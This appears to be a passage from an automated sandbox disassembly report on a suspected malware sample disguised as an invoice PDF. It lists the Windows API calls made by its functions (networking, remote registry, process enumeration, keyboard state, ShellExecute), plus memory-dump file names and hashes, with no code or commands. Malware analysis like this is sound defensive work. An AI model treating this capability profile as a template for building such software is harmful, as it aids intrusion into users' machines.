                                                                                • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                              • inet_addr.WSOCK32(?), ref: 00464B1F
                                                                              • gethostbyname.WSOCK32(?), ref: 00464B29
                                                                              • _memset.LIBCMT ref: 00464B92
                                                                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                              • WSACleanup.WSOCK32 ref: 00464CE4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                              • String ID:
                                                                              • API String ID: 3424476444-0
                                                                              • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                              • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                              • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                              • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                              • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                              • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                              • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID:
                                                                              • API String ID: 535477410-0
                                                                              • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                              • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                              • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                              • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                              APIs
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _memset.LIBCMT ref: 004538C4
                                                                              • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                              • _wcslen.LIBCMT ref: 00453960
                                                                              • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 3530711334-4108050209
                                                                              • Opcode ID: 826260849fdb01d25fb69803446c9be5f6ae0b07ab40188f783494e4e9457c52
                                                                              • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                              • Opcode Fuzzy Hash: 826260849fdb01d25fb69803446c9be5f6ae0b07ab40188f783494e4e9457c52
                                                                              • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                              • String ID: HH
                                                                              • API String ID: 3488606520-2761332787
                                                                              • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                              • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                              • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                              • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                              • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                              • LineTo.GDI32(?,?), ref: 004474BF
                                                                              • CloseFigure.GDI32(?), ref: 004474C6
                                                                              • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                              • Rectangle.GDI32(?,?), ref: 004474F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 4082120231-0
                                                                              • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                              • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                              • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                              • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                              • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                              • LineTo.GDI32(?,?), ref: 004474BF
                                                                              • CloseFigure.GDI32(?), ref: 004474C6
                                                                              • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                              • Rectangle.GDI32(?,?), ref: 004474F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 4082120231-0
                                                                              • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                              • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                              • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                              • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 288456094-0
                                                                              • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                              • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                              • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                              • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 004449B0
                                                                              • GetKeyboardState.USER32(?), ref: 004449C3
                                                                              • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                              • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                              • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                              • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00444BA9
                                                                              • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                              • SetKeyboardState.USER32(?), ref: 00444C08
                                                                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                              • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                              • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                              • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                              • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                              • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                              • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                              • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                              • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                              • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00457C34
                                                                              • _memset.LIBCMT ref: 00457CE8
                                                                              • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                              • String ID: <$@
                                                                              • API String ID: 1325244542-1426351568
                                                                              • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                              • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                              • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                              • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                              • __wsplitpath.LIBCMT ref: 004737E1
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscat.LIBCMT ref: 004737F6
                                                                              • __wcsicoll.LIBCMT ref: 00473818
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2547909840-0
                                                                              • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                              • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                              • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                              • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                              • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                              • String ID:
                                                                              • API String ID: 2354583917-0
                                                                              • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                              • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                              • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                              • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • GetMenu.USER32 ref: 004776AA
                                                                              • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                              • _wcslen.LIBCMT ref: 0047771A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
